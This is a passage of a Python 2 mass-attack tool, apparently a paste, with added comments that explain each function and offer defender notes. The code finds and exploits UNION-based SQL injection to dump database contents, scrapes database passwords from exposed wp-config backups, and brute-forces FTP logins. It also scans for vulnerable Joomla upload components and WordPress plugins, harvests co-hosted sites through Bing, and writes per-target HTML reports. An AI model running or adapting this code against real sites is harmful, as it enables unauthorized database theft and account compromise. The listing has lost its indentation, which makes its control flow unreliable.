  726. resp1 = urllib2.urlopen(site + "+union+select+" + str(co) + "--").read()
  727. findu = re.findall('<font color="yassinox">(.*?)</font>' , resp1)
  728. for i in range(len(findu)):
  729. db.append(findu[i])
  730. except :
  731. pass
  732. def grabtab(site,inf,col):
  733. try :
  734. print colors.CYAN + "|-> Try To get Tables"
  735. co = col.replace(str(inf),"group_concat(0x3c666f6e7420636f6c6f723d2279617373696e6f78223e,table_name,0x3c2f666f6e743e)")
  736. resp1 = urllib2.urlopen(site + "+union+select+" + str(co) + "+from+information_schema.tables+where+table_schema=database()--").read()
  737. findu = re.findall('<font color="yassinox">(.*?)</font>' , resp1)
  738. for i in range(len(findu)):
  739. admins.append(findu[i])
  740. except :
  741. pass
  742. def grabcol(site,inf,col):
  743. try :
  744. print colors.CYAN + "|-> Try To get columns"
  745. co = col.replace(str(inf),"group_concat(0x3c666f6e7420636f6c6f723d2279617373696e6f78223e,column_name,0x3e,table_name,0x3c2f666f6e743e)")
  746. resp1 = urllib2.urlopen(site + "+union+select+" + str(co) + "+from+information_schema.columns+where+table_schema=database()--").read()
  747. findu = re.findall('<font color="yassinox">(.*?)</font>' , resp1)
  748. for i in range(len(findu)):
  749. columns.append(findu[i])
  750.  
  751. except :
  752. pass
  753. def dumpcol(site,inf,col):
  754. column = raw_input(colors.CYAN + "| Column To dump : ")
  755. need,table = column.split(">")
  756. print colors.CYAN + "|-> Try To Dump Column "
  757. co = col.replace(str(inf),"group_concat(0x3c666f6e7420636f6c6f723d2279617373696e6f78223e," + str(need) + ",0x3c2f666f6e743e)")
  758. resp1 = urllib2.urlopen(site + "+union+select+" + str(co) + "+from+" + str(table)).read()
  759. findu = re.findall('<font color="yassinox">(.*?)</font>' , resp1)
  760. for i in range(len(findu)):
  761. dumps.append(findu[i])
  762.  
  763. def getsqliinfcol(site,num,col):
  764. try:
  765. i = 1
  766. while i < num :
  767. co = col.replace(str(i),"0x79617373696e6f78")
  768. resp1 = urllib2.urlopen(site + "+union+select+" + str(co) + "--").read()
  769. fin = re.findall("yassinox",resp1)
  770. if fin :
  771. print colors.GREEN+ "|-> Infected Column > " + str(i)
  772. grabdata(site,i,col)
  773. showdb()
  774. grabtab(site,i,col)
  775. showtb()
  776. grabcol(site,i,col)
  777. showcl()
  778. dumpcol(site,i,col)
  779. showdump()
  780. i = str(num)
  781. i = i + 1
  782. except urllib2.HTTPError, e:
  783. if e.code == 406 :
  784. print colors.RED + "| Got 406"
  785. if e.code == 403 :
  786. print colors.RED + "|- Got 403" #~Incha2allah Bypass in next version
  787. except :
  788. pass
  # Probe `site` with "+order+by+N--" for N counting up from 0 (loop bounded by
  # 25) and search the responses for "SQL" and for the strings in `error` to
  # infer a column count, which is printed, passed to unstat() and left in the
  # global c.
  # Incrementing ORDER BY values against one parameter in quick succession is a
  # recognisable pattern in request logs.
  # NOTE(review): the nesting of the loop body cannot be recovered from this
  # listing; treat the control flow described here as approximate.
  789. def getsqlicol(site):
  790. global c
  791. print "|- exploiting Sql Injection "
  792. try :
  793. c = 0
  794. while c < 25 :
  795. response = urllib2.urlopen(site + "+order+by+" + str(c) + "--").read()
  796. sqli = re.findall('SQL',response)
  797. if sqli :
  798. i = False
  799. else :
  800. a = c + 1
  801. response = urllib2.urlopen(site + "+order+by+" + str(a) + "--").read()
  802. for er in error :
  803. sqli = re.findall(er,response)
  804. if sqli :
  805. print colors.GREEN + "|-> Columns Numbers > " + str(c)
  806. num = c
  807. unstat(c)
  808. c = c + 50
  809. break
  810. c = c +1
  811. except :
  812. print colors.RED+ "|- Can't Find Columns number "
  813. pass
  814.  
  815. def exploitsqli() :
  816. sqliss = unique(sqlilist)
  817. for sq in sqliss :
  818. getsqlicol(sq)
  819. getsqliinfcol(sq,c,k)
  820. #-------------------------------------------------
  # Fetch every URL collected in wpconfigbak and print each value captured by
  # the pattern 'DB_PASSWORD', '(.*?)' — database passwords read from exposed
  # wp-config backup files.
  # All exceptions are silently ignored.
  821. def grabpasswords():
  822. try :
  823. print bcolors.OKBLUE+ "|---------- Grab Passwords----------| "
  824. for conf in wpconfigbak :
  825. reads = urllib2.urlopen(conf).read()
  826. password = re.findall("'DB_PASSWORD', '(.*?)'", reads)
  827. for passs in password :
  828. print bcolors.FAIL + "|-> " + str(passs) + " <-|"
  829. print bcolors.OKBLUE+ "|---------- Grab Passwords----------| "
  830. except :
  831. pass
  832. #-------------------------------------------------
  833. def grabuploadedlink():
  834. try :
  835. for upl in upllist :
  836. site = upl.replace("http://","")
  837. site = re.findall("(.*?)/", site)
  838. final = "http://" + site[0] + "/"
  839. for dir in dirs :
  840. currentcode = urllib.urlopen(final + dir).getcode()
  841. if currentcode == 200 :
  842. print bcolors.OKGREEN + "|- Found Directory > " + str(final + dir)
  843. except :
  844. pass
  845. #-------------------------------------------------
  846. def scanjoomla():
  847. try :
  848. print bcolors.OKBLUE + "|- Scanning Joomla From most Known Components"
  849. for jo in jolist :
  850. for link,name in jot.iteritems() :
  851. currentcodetwo = urllib.urlopen(jo + "/" + str(link)).getcode()
  852. if currentcodetwo == 200 :
  853. jocheck = urllib2.urlopen(jo + "/" + str(link)).read()
  854. found = re.findall(str(name), jocheck)
  855. if found :
  856. print bcolors.FAIL + "|-> Found Joomla " + bcolors.OKGREEN + str(name) + bcolors.FAIL + " In " + bcolors.OKGREEN + str(jo)
  857. except :
  858. pass
  859. #-------------------------------------------------
  # Request site + "/" + com_media_inj and report the site when the response
  # contains the com_media upload form markup. Only the presence of the form is
  # tested here; nothing is uploaded by this function.
  # All exceptions are silently ignored.
  860. def check(site):
  861. try :
  862. ur = urllib2.urlopen(site + "/" + com_media_inj).read()
  863. check = re.findall('id="uploadForm" name="uploadForm" method="post" enctype="multipart/form-data">',ur)
  864. if check :
  865. print bcolors.FAIL + "|-> Com Media > " + site
  866. except :
  867. pass
  868. def com_mediascan():
  869. print bcolors.OKBLUE + "|================ Com Media ================| "
  870. for jo in jolist :
  871. check(jo)
  872. print bcolors.OKBLUE + "|================ Com Media ================| "
  873. #-------------------------------------------------
  # scanwp: for each site in the global wplist, request every path in the
  # `wpt` mapping (path -> plugin name, defined outside this view) and print
  # the plugin name when the status is HTTP 200. Only the status code is
  # checked; the response body is not inspected. Unlike the sibling
  # scanners there is no exception handling in this block.
  # Defender note: many requests for known plugin paths from a single client
  # in a short time indicate this kind of enumeration; rate limiting and
  # removing unused plugins both reduce its value.
  874. def scanwp():
  875. print bcolors.OKBLUE + "|- Scanning Wordpress From most Known plugins"
  876. for wp in wplist :
  877. for link,name in wpt.iteritems() :
  878. currentcodetwo = urllib.urlopen(wp + "/" + str(link)).getcode()
  879. if currentcodetwo == 200 :
  880. print bcolors.FAIL + "|-> Found Wordpress Plugin " + bcolors.OKGREEN + str(name) + bcolors.FAIL + " In " + bcolors.OKGREEN + str(wp)
  881. #-------------------------------------------------
  # bing_check: query Bing with the `ip:` operator (URL-encoded as ip%3A) for
  # PHP pages hosted on `ip`, 50 results per request, and append every link
  # found in an <h2><a href="..."> to the global `urls` list. `lista` is
  # assigned but not used in these lines, and nothing is returned.
  # NOTE(review): indentation is lost in this paste, so whether `page += 50`
  # belongs to the loop body or to the except branch cannot be told from here.
  # Defender note: this stage talks only to the search engine, so it leaves
  # no entry in the target's own logs. On shared hosting every site on the
  # same IP is collected, not only the one originally named.
  882. def bing_check(ip):
  883. page = 1
  884. lista = []
  885. while page <= 101:
  886. try:
  887. bing = "http://www.bing.com/search?q=ip%3A" + ip + "+*.php&count=50&first=" + str(page)
  888. openbing = urllib2.urlopen(bing)
  889. readbing = openbing.read()
  890. findwebs = re.findall('<h2><a href="(.*?)"', readbing)
  891. for i in range(len(findwebs)):
  892. x = findwebs[i]
  893. urls.append(x)
  894. except:
  895. pass
  896.  
  897. page += 50
  # scanuplcheck: fetch every URL returned by unique(urls) (`unique` is
  # defined outside this view) and print those whose HTML contains the
  # literal text type="file". The test is a plain string match on the page
  # source, so it reports any page with a file input, whatever that form does.
  # Any exception is swallowed by the bare except.
  # Defender note: pages flagged here are the ones whose upload handling
  # deserves review (authentication, file type and size limits, storage
  # outside the web root).
  898. def scanuplcheck() :
  899. print bcolors.OKBLUE + "|- Ready To check Upload From Crawled Urls"
  900. try :
  901. for url in unique(urls) :
  902. aa =urllib2.urlopen(url).read()
  903. bb = re.findall('type="file"',aa)
  904. if bb :
  905. print bcolors.FAIL + "|-> Upload From Crawl > " + url
  906. except :
  907. pass
  # scansqlicheck: request every URL returned by unique(urls) with a single
  # quote appended and print those whose response contains the literal text
  # "SQL". The match is a bare substring test on the whole response body.
  # Any exception is swallowed by the bare except.
  # Defender note: requests whose URL ends in a stray quote character are
  # easy to spot in access logs. Parameterised queries remove the underlying
  # flaw, and suppressing database error text in responses removes the
  # signal this check relies on.
  908. def scansqlicheck() :
  909. print bcolors.OKBLUE + "|- Ready To check sqli From Crawled Urls"
  910. try :
  911. for url in unique(urls) :
  912. aa =urllib2.urlopen(url + "'").read()
  913. bb = re.findall('SQL',aa)
  914. if bb :
  915. print bcolors.FAIL + "|-> sql Injection From Crawl > " + url
  916. except :
  917. pass
  # bruteftp: open an FTP connection to `ip` and attempt one login with the
  # given user and password. On success the pair is printed and the session
  # is closed with quit(); every exception, a rejected login included, is
  # swallowed by the bare except.
  # Defender note: each call is a separate connection and login attempt, so
  # server logs show repeated failed FTP logins from one source. Account
  # lockout or per-source throttling, and replacing plain FTP with key-based
  # SFTP, are the usual mitigations.
  918. def bruteftp(ip,user,password):
  919. try:
  920. ftp = FTP(ip)
  921. ftp.login(user, password)
  922. print (bcolors.OKGREEN + '|-> FTP Attacked with username ' + str(user) + ' And password is ' + str(password))
  923. ftp.quit()
  924. except:
  925. pass
  # attackftp: call bruteftp() for every combination of a name in the global
  # cpusers list and a password in the module-level `passwords` list, i.e.
  # len(cpusers) * len(passwords) login attempts against `ip`.
  # Any exception is swallowed by the bare except.
  # Defender note: the password list defined at the top of the file holds
  # only a few common values, so the accounts at risk are those still using
  # default or trivial passwords; the attempts appear as a short burst of
  # failed logins across several usernames.
  926. def attackftp(ip) :
  927. try :
  928. print bcolors.OKBLUE + "|- Brute Forcing Ftp "
  929. for user in cpusers :
  930. for password in passwords :
  931. bruteftp(ip,user,password)
  932. except :
  933. pass
  # showwp: append the WordPress section to reports/<ip>_report.html: a
  # heading, an opening <textarea>, one line per entry of the global wplist,
  # then the closing </textarea>. The file is reopened in append mode for
  # every write; the explicit f.close() calls follow a `with` block that
  # already manages the file.
  # Analyst note: entries are written without HTML escaping, so a report
  # recovered during an investigation is safer read as text than opened in
  # a browser.
  934. def showwp(ip):
  935. with open("reports/" + ip + '_report.html', 'a') as f:
  936. f.write('<center><font color="yellow" size=4>WORDPRESS </font><font color="blue" size=4>SITES</font><font color="green" size=4></font></center>' )
  937. f.write('<center><textarea rows="10" cols="40">' )
  938. f.close()
  939. for wp in wplist :
  940. with open("reports/" + ip + '_report.html', 'a') as f:
  941. f.write(wp + "\n")
  942. f.close()
  943. with open("reports/" + ip + '_report.html', 'a') as f:
  944. f.write('</textarea>' )
  945. f.close()
  # showjo: append the Joomla section to reports/<ip>_report.html: a heading,
  # an opening <textarea>, one line per entry of the global jolist, then the
  # closing </textarea>. The file is reopened in append mode for every write.
  # Analyst note: entries are written without HTML escaping, so a recovered
  # report is safer read as text than opened in a browser.
  946. def showjo(ip):
  947. with open("reports/" + ip + '_report.html', 'a') as f:
  948. f.write('<center><font color="yellow" size=4>Joomla </font><font color="blue" size=4>SITES</font><font color="green" size=4></font></center>' )
  949. f.write('<center><textarea rows="10" cols="40">' )
  950. f.close()
  951. for jo in jolist :
  952. with open("reports/" + ip + '_report.html', 'a') as f:
  953. f.write(jo + "\n")
  954. f.close()
  955. with open("reports/" + ip + '_report.html', 'a') as f:
  956. f.write('</textarea>' )
  957. f.close()
  # showad: append the admin-panel section to reports/<ip>_report.html: a
  # heading followed by one hyperlink per entry of the global adlist. The
  # file is reopened in append mode for every write.
  # Analyst note: each entry is concatenated into both the href attribute
  # and the link text without escaping, so a recovered report is safer read
  # as text than opened in a browser.
  958. def showad(ip):
  959. with open("reports/" + ip + '_report.html', 'a') as f:
  960. f.write('<center><font color="yellow" size=4>Admin Panel </font><font color="blue" size=4>SITES</font><font color="green" size=4></font></center>' )
  961. f.close()
  962. for ad in adlist :
  963. with open("reports/" + ip + '_report.html', 'a') as f:
  964. f.write('<br><a href="' + str(ad) + '"><font color="blue" size="3">' + str(ad) + '</font></a><br>')
  965. f.close()
  # showsqli: append the SQL-injection section to reports/<ip>_report.html:
  # a heading followed by one hyperlink per entry of the global sqlilist.
  # The file is reopened in append mode for every write.
  # Analyst note: each entry is concatenated into both the href attribute
  # and the link text without escaping, so a recovered report is safer read
  # as text than opened in a browser.
  966. def showsqli(ip):
  967. with open("reports/" + ip + '_report.html', 'a') as f:
  968. f.write('<center><font color="yellow" size=4>SQL Injection </font><font color="blue" size=4>SITES</font><font color="green" size=4></font></center>' )
  969. f.close()
  970. for sq in sqlilist :
  971. with open("reports/" + ip + '_report.html', 'a') as f:
  972. f.write('<br><a href="' + str(sq) + '"><font color="blue" size="3">' + str(sq) + '</font></a><br>')
  973. f.close()
  # showupl: append the upload section to reports/<ip>_report.html: a
  # heading followed by one hyperlink per entry of the global upllist. The
  # file is reopened in append mode for every write.
  # Analyst note: each entry is concatenated into both the href attribute
  # and the link text without escaping, so a recovered report is safer read
  # as text than opened in a browser.
  974. def showupl(ip):
  975. with open("reports/" + ip + '_report.html', 'a') as f:
  976. f.write('<center><font color="yellow" size=4>Upload </font><font color="blue" size=4>SITES</font><font color="green" size=4></font></center>' )
  977. f.close()
  978. for up in upllist :
  979. with open("reports/" + ip + '_report.html', 'a') as f:
  980. f.write('<br><a href="' + str(up) + '"><font color="blue" size="3">' + str(up) + '</font></a><br>')
  981. f.close()
  # showc: append the "CP USERS" section to reports/<ip>_report.html: a
  # heading, an opening <textarea>, one line per entry of the global cpusers
  # list, then the closing </textarea>. The file is reopened in append mode
  # for every write.
  # NOTE(review): main() as shown in this paste does not call showc.
  # Analyst note: entries are written without HTML escaping, so a recovered
  # report is safer read as text than opened in a browser.
  982. def showc(ip):
  983. with open("reports/" + ip + '_report.html', 'a') as f:
  984. f.write('<center><font color="yellow" size=4>CP </font><font color="blue" size=4>USERS</font><font color="green" size=4></font></center>' )
  985. f.write('<center><textarea rows="10" cols="40">' )
  986. f.close()
  987. for u in cpusers :
  988. with open("reports/" + ip + '_report.html', 'a') as f:
  989. f.write(u + "\n")
  990. f.close()
  991. with open("reports/" + ip + '_report.html', 'a') as f:
  992. f.write('</textarea>' )
  993. f.close()
  994. #~~~~~~~~~~~~~
  # main: run the whole pipeline for one target. It empties the shared
  # global result lists, resolves `ip` with socket.gethostbyname (on failure
  # the original string is kept), appends the HTML header and `style` to
  # reports/<ip>_report.html, prints the target, then calls the collection
  # and report helpers in the fixed order listed below. extractserver,
  # grabwp, grabjo, admingrabber, grabadfs, counta, grabsqli, count and
  # grabupl are defined outside this view.
  # NOTE(review): indentation is lost in this paste; the three f.write calls
  # are assumed to belong to the `with` block.
  # Analyst note: files named reports/<ip>_report.html on a host are an
  # on-disk artifact of this tool having been run, one file per target.
  995. def main(ip):
  996. del cpusers[:]
  997. del jolist[:]
  998. del wplist[:]
  999. del adlist[:]
  1000. del sqlilist[:]
  1001. del upllist[:]
  1002. del sites[:]
  1003. del jcelist[:]
  1004. del urls[:]
  1005. del wpconfigbak[:]
  1006. try :
  1007. ip = socket.gethostbyname(ip)
  1008. except :
  1009. pass
  1010. with open("reports/" + ip + '_report.html', 'a') as f:
  1011. f.write("<html>")
  1012. f.write(style)
  1013. f.write('<hr color="red">')
  1014. print bcolors.WARNING + "|-> Target : " + str(ip)
  1015. extractserver(ip)
  1016. grabwp(ip)
  1017. showwp(ip)
  1018. grabjo(ip)
  1019. showjo(ip)
  1020. admingrabber(ip)
  1021. grabadfs()
  1022. counta()
  1023. showad(ip)
  1024. grabsqli(ip)
  1025. count()
  1026. showsqli(ip)
  1027. grabupl(ip)
  1028. showupl(ip)
  1029. grabuploadedlink()
  1030. #~~~~~~~~~~~~~
  1030. #~~~~~~~~~~~~~
  # Script entry: iterate over `ips` (defined outside this view), strip
  # trailing whitespace from each entry and run main() on it. This executes
  # at module level with no __main__ guard, so importing the file starts it.
  1031. for ip in ips :
  1032. ip = ip.rstrip()
  1033. main(ip)
  1034. #~~~~~~~~~~~~~